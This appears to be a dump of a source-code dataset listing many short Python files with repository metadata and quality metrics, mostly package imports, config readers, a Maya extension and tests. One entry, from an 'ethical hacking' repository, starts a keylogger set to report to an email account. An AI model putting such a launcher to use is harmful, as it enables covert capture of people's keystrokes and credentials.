hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
325d0945dfdb922e2752a205a7784282af3f95cd
| 27
|
py
|
Python
|
BuildForMac/assets/plc/python/plc/__init__.py
|
ApachePointObservatory/stui
|
cfaaa9bcec9da9ac21bad1b9a2c7db2a739ffc97
|
[
"BSD-3-Clause"
] | 2
|
2019-05-07T04:33:57.000Z
|
2021-12-16T19:54:02.000Z
|
BuildForMac/assets/plc/python/plc/__init__.py
|
ApachePointObservatory/stui
|
cfaaa9bcec9da9ac21bad1b9a2c7db2a739ffc97
|
[
"BSD-3-Clause"
] | 5
|
2018-05-29T20:14:50.000Z
|
2020-02-17T21:58:30.000Z
|
BuildForMac/assets/plc/python/plc/__init__.py
|
ApachePointObservatory/stui
|
cfaaa9bcec9da9ac21bad1b9a2c7db2a739ffc97
|
[
"BSD-3-Clause"
] | 2
|
2019-10-18T22:02:54.000Z
|
2020-09-26T04:20:26.000Z
|
from InterlocksWdg import *
| 27
| 27
| 0.851852
| 3
| 27
| 7.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 27
| 1
| 27
| 27
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
328b24b81cfa9e3a1154503f51c99f43b66c13d1
| 61
|
py
|
Python
|
genweb/scholarship/z3cwidget/__init__.py
|
UPCnet/genweb.scholarship
|
8661e2271dc3489934de5330ebfdcbd9df439991
|
[
"MIT"
] | null | null | null |
genweb/scholarship/z3cwidget/__init__.py
|
UPCnet/genweb.scholarship
|
8661e2271dc3489934de5330ebfdcbd9df439991
|
[
"MIT"
] | null | null | null |
genweb/scholarship/z3cwidget/__init__.py
|
UPCnet/genweb.scholarship
|
8661e2271dc3489934de5330ebfdcbd9df439991
|
[
"MIT"
] | null | null | null |
# Convenience import
from widget import FieldsetFieldWidget
| 15.25
| 38
| 0.852459
| 6
| 61
| 8.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131148
| 61
| 3
| 39
| 20.333333
| 0.981132
| 0.295082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
32b0572d1c9b118bcc245535bcdd512d6e3e9b05
| 128
|
py
|
Python
|
keylogger/Slogger.py
|
SMuthomi/Python-Ethical-hacking
|
74a2443963d38a19c0b5400a079148a0fed92485
|
[
"MIT"
] | null | null | null |
keylogger/Slogger.py
|
SMuthomi/Python-Ethical-hacking
|
74a2443963d38a19c0b5400a079148a0fed92485
|
[
"MIT"
] | null | null | null |
keylogger/Slogger.py
|
SMuthomi/Python-Ethical-hacking
|
74a2443963d38a19c0b5400a079148a0fed92485
|
[
"MIT"
] | null | null | null |
#!usr/bin/env python
import keylogger
my_keylogger = keylogger.Keylogger(120, "email_address", "password")
my_keylogger.start()
| 25.6
| 68
| 0.789063
| 17
| 128
| 5.764706
| 0.705882
| 0.22449
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025424
| 0.078125
| 128
| 5
| 69
| 25.6
| 0.805085
| 0.148438
| 0
| 0
| 0
| 0
| 0.192661
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.333333
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 5
|
087c6a54516d061e26f1de146080ba848471de0d
| 1,537
|
py
|
Python
|
realnet_server/config.py
|
virtual-space/realnet-server
|
4a070f7a72dc6522ac5c27333d23c84e11202d6b
|
[
"BSD-3-Clause"
] | 1
|
2022-01-27T11:04:56.000Z
|
2022-01-27T11:04:56.000Z
|
realnet_server/config.py
|
virtual-space/realnet-server
|
4a070f7a72dc6522ac5c27333d23c84e11202d6b
|
[
"BSD-3-Clause"
] | 1
|
2022-01-28T02:31:28.000Z
|
2022-01-28T02:39:02.000Z
|
realnet_server/config.py
|
virtual-space/realnet-server
|
4a070f7a72dc6522ac5c27333d23c84e11202d6b
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from dotenv import *
from .models import BlobType
path = os.path.join(os.getcwd(), ".env")
if os.path.exists(path):
load_dotenv(dotenv_path=path)
class Config:
def get_database_url(self):
return 'postgresql://{0}:{1}@{2}:{3}/{4}'.format(os.getenv('REALNET_DB_USER'),
os.getenv('REALNET_DB_PASS'),
os.getenv('REALNET_DB_HOST'),
os.getenv('REALNET_DB_PORT'),
os.getenv('REALNET_DB_NAME'))
def get_server_host(self):
return os.getenv('REALNET_SERVER_HOST')
def get_server_port(self):
return os.getenv('REALNET_SERVER_PORT')
def get_storage_type(self):
return BlobType[os.getenv('REALNET_STORAGE_TYPE')]
def get_storage_path(self):
return os.getenv('REALNET_STORAGE_PATH')
def get_s3_region(self):
return os.getenv('REALNET_STORAGE_S3_REGION')
def get_s3_bucket(self):
return os.getenv('REALNET_STORAGE_S3_BUCKET')
def get_s3_key(self):
return os.getenv('REALNET_STORAGE_S3_KEY')
def get_s3_secret(self):
return os.getenv('REALNET_STORAGE_S3_SECRET')
def get_app_secret(self):
return os.getenv('REALNET_APP_SECRET')
def get_jwt_key(self):
return os.getenv('REALNET_JWT_KEY')
def get_jwt_issuer(self):
return os.getenv('REALNET_JWT_ISSUER')
| 30.137255
| 86
| 0.590761
| 192
| 1,537
| 4.40625
| 0.244792
| 0.1513
| 0.283688
| 0.212766
| 0.388889
| 0.388889
| 0.160757
| 0
| 0
| 0
| 0
| 0.012093
| 0.300586
| 1,537
| 50
| 87
| 30.74
| 0.774884
| 0
| 0
| 0
| 0
| 0
| 0.219258
| 0.08393
| 0
| 0
| 0
| 0
| 0
| 1
| 0.342857
| false
| 0.028571
| 0.085714
| 0.342857
| 0.8
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
08e55ef82943d04ad8236c93c61a9c1ee982782d
| 81
|
py
|
Python
|
scalabel/label/__init__.py
|
exnx/scalabel
|
a06e1734d63c54cee745068a633d8317827fb94b
|
[
"Apache-2.0"
] | null | null | null |
scalabel/label/__init__.py
|
exnx/scalabel
|
a06e1734d63c54cee745068a633d8317827fb94b
|
[
"Apache-2.0"
] | null | null | null |
scalabel/label/__init__.py
|
exnx/scalabel
|
a06e1734d63c54cee745068a633d8317827fb94b
|
[
"Apache-2.0"
] | null | null | null |
"""Label definition and conversion."""
from . import from_coco, to_coco, typing
| 20.25
| 40
| 0.740741
| 11
| 81
| 5.272727
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135802
| 81
| 3
| 41
| 27
| 0.828571
| 0.395062
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
3ea825e85c863399d76ee859e5c7142bac2a0e31
| 80
|
py
|
Python
|
astroimages_fits/__init__.py
|
AstroImages/astroimages-fits
|
bccc225b532b7bea57950c230afca6f3968a6535
|
[
"MIT"
] | null | null | null |
astroimages_fits/__init__.py
|
AstroImages/astroimages-fits
|
bccc225b532b7bea57950c230afca6f3968a6535
|
[
"MIT"
] | 2
|
2020-03-18T22:33:55.000Z
|
2020-03-22T21:30:15.000Z
|
astroimages_fits/__init__.py
|
AstroImages/astroimages-fits
|
bccc225b532b7bea57950c230afca6f3968a6535
|
[
"MIT"
] | null | null | null |
from astroimages_fits.fits_util_functions import extract_metadata_from_fits_file
| 80
| 80
| 0.95
| 12
| 80
| 5.75
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0375
| 80
| 1
| 80
| 80
| 0.896104
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
3ecf1bbd59205dfec9a7617693eecaf9eb1f629c
| 123
|
py
|
Python
|
tests/conftest.py
|
pombredanne/patchy
|
8587de4f3384af2f6e0e6c6c09a5dcf33b3eecef
|
[
"BSD-3-Clause"
] | 105
|
2015-06-17T13:44:00.000Z
|
2022-03-09T11:06:06.000Z
|
tests/conftest.py
|
pombredanne/patchy
|
8587de4f3384af2f6e0e6c6c09a5dcf33b3eecef
|
[
"BSD-3-Clause"
] | 71
|
2015-06-09T16:09:51.000Z
|
2021-11-06T09:15:49.000Z
|
tests/conftest.py
|
pombredanne/patchy
|
8587de4f3384af2f6e0e6c6c09a5dcf33b3eecef
|
[
"BSD-3-Clause"
] | 12
|
2015-06-09T16:04:53.000Z
|
2020-12-30T00:37:59.000Z
|
import pytest
import patchy.api
@pytest.fixture(autouse=True)
def clear_cache():
patchy.api._patching_cache.clear()
| 13.666667
| 38
| 0.764228
| 17
| 123
| 5.352941
| 0.647059
| 0.197802
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121951
| 123
| 8
| 39
| 15.375
| 0.842593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
3ee93b4aa070fd9df6e2eb0dd34be1dad47c61f0
| 6,075
|
py
|
Python
|
bana/OpenMaya/MFnDagNode.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | 24
|
2017-01-11T15:57:46.000Z
|
2020-09-23T06:18:30.000Z
|
bana/OpenMaya/MFnDagNode.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | null | null | null |
bana/OpenMaya/MFnDagNode.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | 2
|
2017-03-06T23:52:08.000Z
|
2020-09-23T06:19:03.000Z
|
"""Extensions for the ``maya.OpenMaya.MFnDagNode`` class."""
import gorilla
from maya import OpenMaya
@gorilla.patches(OpenMaya.MFnDagNode)
class MFnDagNode(object):
"""Container for the extensions."""
@classmethod
def bnFind(cls, pattern=None, recursive=True, traverseUnderWorld=True):
"""DAG node iterator.
The calling class defines the function set type for which the nodes
need to be compatible with. It also represents the type of the object
returned.
Categories: :term:`foundation`.
Parameters
----------
pattern : str
Path or full path pattern of the DAG nodes to match. Wildcards are
allowed.
recursive : bool
``True`` to search recursively.
traverseUnderWorld : bool
``True`` to search within the underworld.
Yields
------
maya.OpenMaya.MDagNode
The nodes found.
Note
----
The pattern matching's global context is set to *full path* if the
parameter ``traverseUnderWorld`` is ``True``, and to *path* otherwise.
See :ref:`pm_matching_rules`.
See Also
--------
:ref:`pattern_matching`, :ref:`retrieving_nodes`.
"""
iterator = OpenMaya.MDagPath.bnFind(
pattern=pattern, fnType=cls().type(), recursive=recursive,
traverseUnderWorld=traverseUnderWorld)
return (cls(dagPath) for dagPath in iterator)
@classmethod
def bnGet(cls, pattern=None, recursive=True, traverseUnderWorld=True):
"""Retrieve a single DAG node.
The calling class defines the function set type for which the node
needs to be compatible with. It also represents the type of the object
returned.
Categories: :term:`foundation`.
Parameters
----------
pattern : str
Path or full path pattern of the DAG node to match. Wildcards are
allowed.
recursive : bool
``True`` to search recursively.
traverseUnderWorld : bool
``True`` to search within the underworld.
Returns
-------
maya.OpenMaya.MFnDagNode
The DAG node found. If none or many were found, ``None`` is
returned.
Note
----
The pattern matching's global context is set to *full path* if the
parameter ``traverseUnderWorld`` is ``True``, and to *path* otherwise.
See :ref:`pm_matching_rules`.
See Also
--------
:ref:`pattern_matching`, :ref:`retrieving_nodes`.
"""
dagPath = OpenMaya.MDagPath.bnGet(
pattern=pattern, fnType=cls().type(), recursive=recursive,
traverseUnderWorld=traverseUnderWorld)
return None if dagPath is None else cls(dagPath)
@gorilla.filter(True)
@gorilla.settings(allow_hit=True)
def __str__(self):
"""Full path name.
It is helpful when interacting with the commands layer by not having to
manually call the ``fullPathName()`` method each time a ``MFnDagNode``
object needs to be passed to a command.
Categories: :term:`fix`.
Returns
-------
str
The full path name.
"""
return self.fullPathName()
def bnFindChildren(self, pattern=None, fnType=OpenMaya.MFn.kInvalid,
recursive=True, traverseUnderWorld=True):
"""DAG node iterator over the children.
Categories: :term:`foundation`.
Parameters
----------
pattern : str
Path or full path pattern of the DAG nodes to match, relative to
the current node. Wildcards are allowed.
fnType : maya.OpenMaya.MFn.Type
Function set type to match.
recursive : bool
``True`` to search recursively.
traverseUnderWorld : bool
``True`` to search within the underworld.
Yields
------
maya.OpenMaya.MDagNode
The nodes found.
Note
----
The pattern matching's global context is set to *full path* if the
parameter ``traverseUnderWorld`` is ``True``, and to *path* otherwise.
See :ref:`pm_matching_rules`.
See Also
--------
:ref:`pattern_matching`, :ref:`retrieving_nodes`.
"""
dagPath = OpenMaya.MDagPath()
self.getPath(dagPath)
iterator = dagPath.bnFindChildren(
pattern=pattern, fnType=fnType, recursive=recursive,
traverseUnderWorld=traverseUnderWorld)
return (OpenMaya.MFnDagNode(dagPath) for dagPath in iterator)
def bnGetChild(self, pattern=None, fnType=OpenMaya.MFn.kInvalid,
recursive=True, traverseUnderWorld=True):
"""Retrieve a single DAG node child.
Categories: :term:`foundation`.
Parameters
----------
pattern : str
Path or full path pattern of the DAG nodes to match, relative to
the current node. Wildcards are allowed.
fnType : maya.OpenMaya.MFn.Type
Function set type to match.
recursive : bool
``True`` to search recursively.
traverseUnderWorld : bool
``True`` to search within the underworld.
Returns
-------
maya.OpenMaya.MDagNode
The node found.
Note
----
The pattern matching's global context is set to *full path* if the
parameter ``traverseUnderWorld`` is ``True``, and to *path* otherwise.
See :ref:`pm_matching_rules`.
See Also
--------
:ref:`pattern_matching`, :ref:`retrieving_nodes`.
"""
dagPath = OpenMaya.MDagPath()
self.getPath(dagPath)
dagPath = dagPath.bnGetChild(
pattern=pattern, fnType=fnType, recursive=recursive,
traverseUnderWorld=traverseUnderWorld)
return None if dagPath is None else OpenMaya.MFnDagNode(dagPath)
| 32.142857
| 79
| 0.590617
| 636
| 6,075
| 5.608491
| 0.194969
| 0.022428
| 0.022428
| 0.035885
| 0.787497
| 0.772358
| 0.772358
| 0.746285
| 0.746285
| 0.692739
| 0
| 0
| 0.313086
| 6,075
| 188
| 80
| 32.31383
| 0.854781
| 0.553745
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.138889
| false
| 0
| 0.055556
| 0
| 0.361111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
3ef474f975c2b19af7d31885c89cc7dc6194956a
| 19
|
py
|
Python
|
py2d/__init__.py
|
mohamedelkansouli/https-github.com-jshaffstall-PyPhysicsSandbox
|
a9b4ea547db68f7eb74240c9d86b80116865ee53
|
[
"MIT"
] | 38
|
2016-12-13T00:57:39.000Z
|
2022-03-02T20:28:32.000Z
|
py2d/__init__.py
|
mohamedelkansouli/https-github.com-jshaffstall-PyPhysicsSandbox
|
a9b4ea547db68f7eb74240c9d86b80116865ee53
|
[
"MIT"
] | 18
|
2016-12-21T15:26:54.000Z
|
2021-01-19T21:19:36.000Z
|
py2d/__init__.py
|
mohamedelkansouli/https-github.com-jshaffstall-PyPhysicsSandbox
|
a9b4ea547db68f7eb74240c9d86b80116865ee53
|
[
"MIT"
] | 7
|
2017-05-05T20:37:37.000Z
|
2020-03-18T01:17:29.000Z
|
from py2d import *
| 9.5
| 18
| 0.736842
| 3
| 19
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 0.210526
| 19
| 1
| 19
| 19
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
412a0167dbe6514974dae85a163ab7eb5b7293d9
| 186
|
py
|
Python
|
jackal/__init__.py
|
mwgielen/jackal
|
7fe62732eb5194b7246215d5277fb37c398097bf
|
[
"MIT"
] | 10
|
2018-01-17T20:11:30.000Z
|
2022-02-20T21:31:37.000Z
|
jackal/__init__.py
|
mwgielen/jackal
|
7fe62732eb5194b7246215d5277fb37c398097bf
|
[
"MIT"
] | null | null | null |
jackal/__init__.py
|
mwgielen/jackal
|
7fe62732eb5194b7246215d5277fb37c398097bf
|
[
"MIT"
] | 1
|
2018-06-21T16:47:16.000Z
|
2018-06-21T16:47:16.000Z
|
from jackal.core import CoreSearch, RangeSearch, HostSearch, ServiceSearch, UserSearch, CredentialSearch, Logger
from jackal.documents import Host, Range, Service, User, Credential, Log
| 62
| 112
| 0.827957
| 21
| 186
| 7.333333
| 0.857143
| 0.12987
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102151
| 186
| 2
| 113
| 93
| 0.922156
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
f5bc7930a29d0fbd25fcb196dca72a88d66e91ea
| 65
|
py
|
Python
|
ppsetuptools/__init__.py
|
Thirdegree/ppsetuptools
|
dafb427815dde0c2a78e133816586b3dfffa836a
|
[
"MIT"
] | 5
|
2020-10-09T22:46:36.000Z
|
2022-01-04T23:27:36.000Z
|
ppsetuptools/__init__.py
|
Thirdegree/ppsetuptools
|
dafb427815dde0c2a78e133816586b3dfffa836a
|
[
"MIT"
] | 2
|
2021-05-05T17:11:23.000Z
|
2021-06-18T18:59:31.000Z
|
ppsetuptools/__init__.py
|
Thirdegree/ppsetuptools
|
dafb427815dde0c2a78e133816586b3dfffa836a
|
[
"MIT"
] | 3
|
2021-03-03T03:46:15.000Z
|
2021-06-18T05:12:24.000Z
|
from .ppsetuptools import * # pylint: disable=redefined-builtin
| 32.5
| 64
| 0.784615
| 7
| 65
| 7.285714
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123077
| 65
| 1
| 65
| 65
| 0.894737
| 0.507692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
f5c2023765b29cdb1a1015cb5c68302b2fa8f53f
| 213
|
py
|
Python
|
raspberry_notifier/credentials.py
|
itgocode/qxf2-lambdas
|
14d2350e4d86158e6e3c1a135ba31ddaf11da684
|
[
"MIT"
] | 3
|
2021-07-03T08:57:43.000Z
|
2021-07-12T13:01:44.000Z
|
raspberry_notifier/credentials.py
|
qxf2/qxf2-lambdas
|
8850a54103089b305830ecc857188cac37199621
|
[
"MIT"
] | 13
|
2020-10-29T08:36:40.000Z
|
2022-02-04T13:45:25.000Z
|
raspberry_notifier/credentials.py
|
itgocode/qxf2-lambdas
|
14d2350e4d86158e6e3c1a135ba31ddaf11da684
|
[
"MIT"
] | 3
|
2020-08-20T08:27:35.000Z
|
2022-01-24T12:31:59.000Z
|
import os
USERNAME = os.environ['USERNAME']
PASSWORD = os.environ['PASSWORD']
PROXY_USERNAME = os.environ['PROXY_USERNAME']
PROXY_PASSWORD = os.environ['PROXY_PASSWORD']
DEVELOPER_KEY = os.environ['DEVELOPER_KEY']
| 35.5
| 45
| 0.784038
| 28
| 213
| 5.75
| 0.285714
| 0.279503
| 0.21118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075117
| 213
| 6
| 46
| 35.5
| 0.817259
| 0
| 0
| 0
| 0
| 0
| 0.266355
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.333333
| 0.166667
| 0
| 0.166667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
f5f5569b6a1d1eba836ac90a944e99b5ee727e95
| 5,464
|
py
|
Python
|
tests/decoding/test_decode_single_type.py
|
pipermerriam/eth-abi-utils
|
49f9dde86a9b02157612b38d814e66774c0a1ac3
|
[
"MIT"
] | null | null | null |
tests/decoding/test_decode_single_type.py
|
pipermerriam/eth-abi-utils
|
49f9dde86a9b02157612b38d814e66774c0a1ac3
|
[
"MIT"
] | null | null | null |
tests/decoding/test_decode_single_type.py
|
pipermerriam/eth-abi-utils
|
49f9dde86a9b02157612b38d814e66774c0a1ac3
|
[
"MIT"
] | null | null | null |
import pytest
from eth_utils import (
decode_hex,
)
from eth_abi.abi import decode_single
@pytest.mark.parametrize(
'input,expected',
(
(decode_hex('0000000000000000000000000000000000000000000000000000000000000015'), 21),
(decode_hex('0000000000000000000000000000000000000000000000000000000000000001'), 1),
(decode_hex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'), -1),
(decode_hex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9c'), -100),
)
)
def test_0x_prefix_optional(input, expected):
output = decode_single('int256', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
